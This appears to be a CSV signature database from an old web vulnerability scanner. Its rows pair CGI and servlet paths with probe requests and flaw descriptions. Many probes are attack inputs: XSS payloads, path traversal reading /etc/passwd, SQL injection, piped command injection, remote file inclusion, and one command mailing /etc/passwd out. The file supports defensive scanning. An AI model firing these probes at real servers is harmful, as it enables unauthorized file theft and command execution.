c,generic,/search97cgi/,s97_cgi?action=FilterSearch&filter=<script>alert('Vulnerable');</script>;,"<script>alert('Vulnerable')</script>",GET,"SCO Unixware search script is vulnerable to XSS and command injection, BID-1717, CVE-2000-1014"
c,generic,/servlet/,"admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service=","server.javawebserver.serviceAdmin",GET,"The Sun JavaServer has the default admin/admin account enabled. Change the password or disable the server if it is not needed."
c,generic,/servlet/,allaire.jrun.ssi.SSIFilter,200,GET,"Allaire Coldfusion allows jsp source viewed through a vulnerable SSI call.","<!--#include virtual=\"/index.jsp\"-->"
c,generic,/servlet/,com.livesoftware.jrun.plugins.ssi.SSIFilter,200,GET,"Allaire Coldfusion allows jsp source viewed through a vulnerable SSI call.","<!--#include virtual=\"/index.jsp\"-->"
c,generic,/servlet/,com.unify.servletexec.UploadServlet,200,GET,"This servlet allows attackers to upload files to the server."
c,generic,/servlet/,ContentServer?pagename=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Open Market Inc.ĘContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page. CA-2000-02."
c,generic,/servlet/,Counter,200,GET,"JRun default servlet found. All default code should be removed from servers."
c,generic,/servlet/,DateServlet,200,GET,"JRun default servlet found. All default code should be removed from servers."
c,generic,/servlet/,FingerServlet,200,GET,"JRun default servlet found. All default code should be removed from servers."
c,generic,/servlet/,HelloWorldServlet,200,GET,"JRun default servlet found. All default code should be removed from servers."
c,generic,/servlet/,IsItWorking,"Yes, It's working",GET,"Default Java (JServ) pages are present."
c,generic,/servlet/,SessionServlet,200,GET,"JRun default servlet found. All default code should be removed from servers."
c,generic,/servlet/,SimpleServlet,200,GET,"JRun default servlet found. All default code should be removed from servers."
c,generic,/servlet/,SnoopServlet,200,GET,"JRun default servlet found. All default code should be removed from servers."
c,generic,/servlet/,sunexamples.BBoardServlet,200,GET,"This default servlet lets attackers execute arbitrary commands." 
c,generic,/session/,admnlogin,200,GET,"SessionServlet Output, has session cookie info."
c,generic,/shop/database/,metacart.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 
c,generic,/shoponline/fpdb/,shop.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 
c,generic,/shopping/database/,metacart.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 
c,generic,/shoppingdirectory/,midicart.mdb,200,GET,"MIDICART database is available for browsing. This should not be allowed via the web server."
c,generic,/SilverStream/Meta/Tables/,?access-mode=text,"_DBProduct",GET,"The SilverStream database structure is available for remote viewing."
c,generic,/site/,"' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username = USER --/.html","root:",GET,"Web DataBlade 4.12/Informix is vulnerable to SQL Injection."
c,generic,/site/,"' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username=USER --/.html","root:",GET,"IBM Informix Web DataBlade allows remote execute of SQL"
c,generic,/SiteScope/htdocs/,SiteScope.html,200,GET,"The SiteScope install may allow remote users to get sensitive information about the hosts being monitored."
c,generic,/sunshop.,index.php?action=storenew&username=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02."
c,generic,/support/,common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to read files on the host."
c,generic,/supporter/,index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;,"<script>alert('Vulnerable')</script>",GET,"MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/supporter/,index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;,"<script>alert('Vulnerable')</script>",GET,"MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/supporter/,index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;,"<script>alert('Vulnerable')</script>",GET,"MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/us/cgi-bin/,sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini,"boot loader",GET,"Default scripts can allow arbitrary access to the host."
c,generic,/users/scripts/,submit.cgi,200,GET,"This might be interesting..."
c,generic,/WEB-INF./,web.xml,200,GET,"Multiple implementations of j2ee servlet containers allow files to be retrieved from WEB-INF by appending a '.' to the directory name. Products include Sybase EA Service, Oracle Containers, Orion, JRun, HPAS, Pramati and others. See http://www.westpoint.ltd.uk/advisories/wp-02-0002.txt fore more info."
c,generic,/webcart-lite/,orders/import.txt,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web."
c,generic,/webcart-lite/config/,import.txt,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web."
c,generic,/webcart/,carts/,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web."
c,generic,/webcart/,config/,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web."
c,generic,/webcart/,config/clients.txt,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web."
c,generic,/webcart/,orders/,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web."
c,generic,/webcart/,orders/import.txt,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web."
c,generic,/webMathematica/,MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif,"root:",GET,"Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version on http://www.wolfram.com/"
c,generic,/webMathematica/,MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif,"boot loader",GET,"Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version on http://www.wolfram.com/"
c,generic,/WebShop/logs/,cc.txt,200,GET,"This might be interesting..."
c,generic,/WebShop/templates/,cc.txt,200,GET,"This might be interesting..."
c,generic,/webtools/bonsai/,"ccvsblame.cgi?file=/index.html&root=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/webtools/bonsai/,"cvsblame.cgi?file=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/webtools/bonsai/,"cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/webtools/bonsai/,"cvslog.cgi?file=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/webtools/bonsai/,"cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/webtools/bonsai/,"cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/webtools/bonsai/,"cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/webtools/bonsai/,"showcheckins.cgi?person=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/Web_Store/,web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html,"root:",GET,"eXtropia's Web Store lets attackers read any file on the system by appending a %00.html to the name."
c,generic,/wikihome/action/,conflict.php,200,GET,"Some versions of this script allow external source to be included/run by appending ?TemplateDir=http://my.host/ to requests."
c,generic,/wwwboard/,passwd.txt,200,GET,"The wwwboard password file is browsable. Change wwwboard to store this file elsewhere, or upgrade to the latest version."
c,generic,/wwwboard/,wwwboard.cgi,200,GET,"This might be interesting..."
c,generic,/wwwboard/,wwwboard.pl,200,GET,"This might be interesting..."
c,generic,/wwwthreads/,3tvars.pm,200,GET,"This might be interesting..."
c,generic,/wwwthreads/,w3tvars.pm,200,GET,"This might be interesting..."
c,generic,/xdk,/,"Oracle XML Development",GET,"Default Oracle documentation found."
c,generic,/xsql/demo/adhocsql/,query.xsql?sql=select%20username%20from%20ALL_USERS,"USERNAME",GET,"This allows attackers to perform queries to the Oracle database. This sample app should be removed."
c,generic,/xsql/demo/airport/,airport.xsql?xml-stylesheet=none,"cvsroot",GET,"This is a sample file which should be removed. Oracle XSQL allows arbitrary code to be execute."
c,generic,/~/,<script>alert('Vulnerable')</script>.asp,"<script>alert('Vulnerable')</script>",GET,"Cross site scripting (XSS) is allowed with .asp file requests (may be Microsoft .net). CA-2000-02"
c,generic,/~/,<script>alert('Vulnerable')</script>.aspx,"<script>alert('Vulnerable')</script>",GET,"Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02"
c,generic,/~/,<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null,"<script>alert('Vulnerable')</script>",GET,"Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02"
c,generic,@CGIDIRS,"alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,"boot.ini",GET,"This CGI allows attackers to execute arbitrary commands on the server."
c,generic,@CGIDIRS,"ccvsblame.cgi?file=/index.html&root=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|","resolv.conf",GET,"Allows attacker to execute commands as http daemon. Upgrade or remove."
c,generic,@CGIDIRS,"cvsblame.cgi?file=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"cvslog.cgi?file=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"excite;IFS=\"$\";/bin/cat /etc/passwd|mail test@test.com",200,GET,"Excite software is vulnerable to password file theft remotely."
c,generic,@CGIDIRS,"FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com","root:",GET,"This CGI allows attackers to read files and execute commands remotely."
c,generic,@CGIDIRS,"info2www '(../../../../../../../bin/mail root </etc/passwd>","root:",GET,"This CGI allows attackers to execute commands. passwd file may have been mailed to root."
c,generic,@CGIDIRS,"login.pl?course_id=\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;","<script>alert('Vulnerable')</script>",GET,"BlackBoard 5 from BlackBoard.com is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1","root:",GET,"Remote file retrieval."
c,generic,@CGIDIRS,"sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3","Unknown configuration",GET,"The Sawmill CGI allows attackers to read the Sawmill password."
c,generic,@CGIDIRS,"shop.pl/page=;cat%20shop.pl|","\/perl",GET,"Shopping Cart (Hassan) allows execution of remote commands. CAN-2001-0985."
c,generic,@CGIDIRS,"showcheckins.cgi?person=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E","<script>alert('Vulnerable')</script>",GET,"urlcount.cgi on the Lil'HTTP server may be vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  CA-2000-02."
c,generic,@CGIDIRS,"viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;","<script>alert('Vulnerable')</script>",GET,"ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  CA-2000-02."
c,generic,@CGIDIRS,%2e%2e/abyss.conf,200,GET,"The Abyss configuration file was successfully retrievd. Upgrade with the latest version/patches for 1.0 from http://www.aprelium.com/"
c,generic,@CGIDIRS,,"Index of ",GET,"Directory indexing of CGI directory should be disabled."
c,generic,@CGIDIRS,.access,200,GET,"Contains authorization information"
c,generic,@CGIDIRS,.cobalt,200,GET,"May allow remote admin of CGI scripts."
c,generic,@CGIDIRS,.cobalt/alert/service.cgi?service=<h1>Hello!</h1><script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02"
c,generic,@CGIDIRS,.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>,"alert('Vulnerable')",GET,"Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,.fhp,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,.htaccess,200,GET,"Contains authorization information"
c,generic,@CGIDIRS,.htaccess.old,200,GET,"Backup/Old copy of .htaccess - Contains authorization information"
c,generic,@CGIDIRS,.htaccess.save,200,GET,"Backup/Old copy of .htaccess - Contains authorization information"
c,generic,@CGIDIRS,.htaccess~,200,GET,"Backup/Old copy of .htaccess - Contains authorization information"
c,generic,@CGIDIRS,.htpasswd,200,GET,"Contains authorization information"
c,generic,@CGIDIRS,.namazu.cgi,200,GET,"Namazu search engine found. Vulnerable to CSS attacks (fixed 2001-11-25). Attacker could write arbitrary files outside docroot (fixed 2000-01-26). CA-2000-02."
c,generic,@CGIDIRS,.passwd,200,GET,"Contains authorization information"
c,generic,@CGIDIRS,/,stat.pl,200,GET,"Uninets StatsPlus 1.25 from http://www.uninetsolutions.com/stats.html may be vulnerable to command/script injection by manipulating HTTP_USER_AGENT or HTTP_REFERER. 
c,generic,@CGIDIRS,/ans/ans.pl?p=../../../../../usr/bin/id|&blah,"uid",GET,"Avenger's News System allows commands to be issued remotely."
c,generic,@CGIDIRS,/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/,"http://xxxxxxxxxx/atk/",GET,"Achievo can be made to include php files from another domain. Upgrade to a new version."
c,generic,@CGIDIRS,/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/,"http://xxxxxxxx/errors/configure_instructions",GET,"Gallery 1.3.0 and below allow PHP files to be included from another domain. Upgrade to the latest version."
c,generic,@CGIDIRS,/GW5/GWWEB.EXE?HELP=bad-request,"Could not find file SYS",GET,"Groupwise allows system information and file retrieval by modifying arguments to the help system."
c,generic,@CGIDIRS,/GWWEB.EXE?HELP=bad-request,"Could not find file SYS",GET,"Groupwise allows system information and file retrieval by modifying arguments to the help system."
c,generic,@CGIDIRS,/rightfax/fuwww.dll/?,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,/scripts/*%0a.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,14all-1.1.cgi?cfg=../../../../../../../../etc/passwd,"root:",GET,"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version."
c,generic,@CGIDIRS,14all.cgi?cfg=../../../../../../../../etc/passwd,"root:",GET,"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version."
c,generic,@CGIDIRS,a1disp3.cgi?../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers read arbitrary files on the host."
c,generic,@CGIDIRS,a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers read arbitrary files on the host."
c,generic,@CGIDIRS,a1stats/a1disp3.cgi?../../../../../../../etc/passwd,"root:",GET,"Remote file retrieval."
c,generic,@CGIDIRS,a1stats/a1disp4.cgi?../../../../../../../etc/passwd,"root:",GET,"Remote file retrieval."
c,generic,@CGIDIRS,addbanner.cgi,200,GET,"This CGI may allow attackers to read any file on the system."
c,generic,@CGIDIRS,adduser.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,add_ftp.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,admin.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,admin.cgi?list=../../../../../../../../../../etc/passwd,"root:",GET,"Add2it Mailman Free V1.73 allows arbitrary files to be retrieved."
c,generic,@CGIDIRS,admin.php,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,admin.php3,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,admin.pl,200,GET,"Might be interesting"
c,generic,@CGIDIRS,adminhot.cgi,200,GET,"This might be interesting... has been seen in web logs from another CGI scanner."
c,generic,@CGIDIRS,adminwww.cgi,200,GET,"This might be interesting... has been seen in web logs from another CGI scanner."
c,generic,@CGIDIRS,af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd,"root:",GET,"AlienForm2 revision 1.5 allows any file to be read from the remote system."
c,generic,@CGIDIRS,aglimpse,200,GET,"This CGI may allow attackers to execute remote commands."
c,generic,@CGIDIRS,aglimpse.cgi,200,GET,"This CGI may allow attackers to execute remote commands."
c,generic,@CGIDIRS,Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0,"resolv.conf",GET,"This CGI allows attackers to view arbitrary files on the host."
c,generic,@CGIDIRS,alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd,"root:",GET,"AlienForm2 revision 1.5 allows any file to be read from the remote system."
c,generic,@CGIDIRS,amadmin.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,anacondaclip.pl?template=../../../../../../../../../../etc/passwd,"root:",GET,"This allows attackers to read arbitrary files from the server."
c,generic,@CGIDIRS,ans.pl?p=../../../../../usr/bin/id|&blah,"uid",GET,"Avenger's News System allows commands to be issued remotely."
c,generic,@CGIDIRS,AnyBoard.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,AnyForm,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,AnyForm2,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/,"root:",GET,"This allows attackers to read arbitrary files from the server."
c,generic,@CGIDIRS,architext_query.cgi,200,GET,"Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands."
c,generic,@CGIDIRS,architext_query.pl,200,GET,"Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands."
c,generic,@CGIDIRS,ash,200,GET,"Shell found in CGI dir!"
c,generic,@CGIDIRS,AT-admin.cgi,200,GET,"Admin interface...no known holes"
c,generic,@CGIDIRS,AT-generate.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=,"<script>alert('Vulnerable')</script>",GET,"Mewsoft Auction 3.0 from http://www.mewsoft.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,auktion.cgi?menue=../../../../../../../../../../etc/passwd,"root:",GET,"The CGI allows attackers to read arbitrary files remotely."
c,generic,@CGIDIRS,auth_data/auth_user_file.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
c,generic,@CGIDIRS,awl/auctionweaver.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,awstats.pl,"Traffic",GET,"Free realtime logfile analyzer for advanced web statistics. Should be protected."
c,generic,@CGIDIRS,ax-admin.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,ax.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,axs.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,badmin.cgi,200,GET,"BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgrade."
c,generic,@CGIDIRS,banner.cgi,200,GET,"This CGI may allow attackers to read any file on the system."
c,generic,@CGIDIRS,bannereditor.cgi,200,GET,"This CGI may allow attackers to read any file on the system."
c,generic,@CGIDIRS,bash,200,GET,"Shell found in CGI dir!"
c,generic,@CGIDIRS,bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd,"root:",GET,"Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files."
c,generic,@CGIDIRS,bb-hist?HISTFILE=../../../../../../../../../../etc/passwd,"root:",GET,"Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files."
c,generic,@CGIDIRS,bb-histlog.sh,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd,"root:",GET,"Versions of BigBrother 1.4h or older allow attackers to read arbitrary files on the system."
c,generic,@CGIDIRS,bbs_forum.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK,"root:",GET,"The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320"
c,generic,@CGIDIRS,betsie/parserl.pl/<script>alert('Vulnerable')</script>;,<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=,"root:",GET,"This CGI allows attackers to read arbitrary files on the host."
c,generic,@CGIDIRS,bizdb1-search.cgi,200,GET,"This CGI may allow attackers to execute commands remotely. See http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm"
c,generic,@CGIDIRS,bnbform,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,bnbform.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10,"root:",GET,"This CGI allows attackers to read arbitrary files on the server."
c,generic,@CGIDIRS,boozt/admin/index.cgi?section=5&input=1,200,GET,"Boozt CGI may have a buffer overflow. Upgrade to a version new than 0.9.8alpha."
c,generic,@CGIDIRS,bsguest.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,bslist.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,bulk/bulk.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,c32web.exe/ChangeAdminPassword,200,GET,"This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password."
c,generic,@CGIDIRS,cached_feed.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,cachemgr.cgi,200,GET,"Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans."
c,generic,@CGIDIRS,calendar/calendar_admin.pl?config=|cat%20/etc/passwd|,"root:",GET,"This CGI allows attackers to read arbitrary files on the host."
c,generic,@CGIDIRS,calendar/index.cgi,200,GET,"Mike's Calendar CGI contained a bug which allowed arbitrary command exectution (version 1.4), see http://freshmeat.net/projects/mycalendar/"
c,generic,@CGIDIRS,calendar_admin.pl?config=|cat%20/etc/passwd|,"root:",GET,"This CGI allows attackers to read arbitrary files on the host."
c,generic,@CGIDIRS,calender_admin.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,cal_make.pl?p0=../../../../../../../../../../etc/passwd%00,"root:",GET,"This CGI allows attackers to read arbitrary files on the host."
c,generic,@CGIDIRS,campas?%0acat%0a/etc/passwd%0a,"root:",GET,"This CGI allows attackers to read arbitrary files on the server."
c,generic,@CGIDIRS,cart.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,cart32.exe,200,GET,"request cart32.exe/cart32clientlist"
c,generic,@CGIDIRS,cartmanager.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,cbmc/forums.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,cgi-lib.pl,200,GET,"CGI Library. If retrieved check to see if it is outdated, it may  have vuls"
c,generic,@CGIDIRS,cgicso?query=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,cgicso?query=AAA,"400 Required field missing: fingerhost",GET,"This CGI allows attackers to execute remote commands."
c,generic,@CGIDIRS,cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00,"root:",GET,"This CGI allows attackers to read arbitrary files on the server."
c,generic,@CGIDIRS,cgimail.exe,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,cgiwrap,200,GET,"Some versions of cgiwrap allow anyone to execute commands remotely." 
c,generic,@CGIDIRS,change-your-password.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,class/mysql.class,"This program is free software",GET,"Basilix allows its configuration files to be downloaded, which  may include the mysql auth credentials."
c,generic,@CGIDIRS,classified.cgi,200,GET,"Check Phrack 55 for info by RFP"
c,generic,@CGIDIRS,classifieds,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,classifieds.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,classifieds/classifieds.cgi,200,GET,"Mike's Classifieds CGI contained a bug which allowed arbitrary command exectution (version 1.2), see http://freshmeat.net/projects/myclassifieds/"
c,generic,@CGIDIRS,clickcount.pl?view=test,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,clickresponder.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,code.php,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,code.php3,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,commandit.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html,"root:",GET,"This CGI allows attackers to read arbitrary files on the server."
c,generic,@CGIDIRS,common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to read files on the host."
c,generic,@CGIDIRS,compatible.cgi,200,GET,"This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). CA-2000-02."
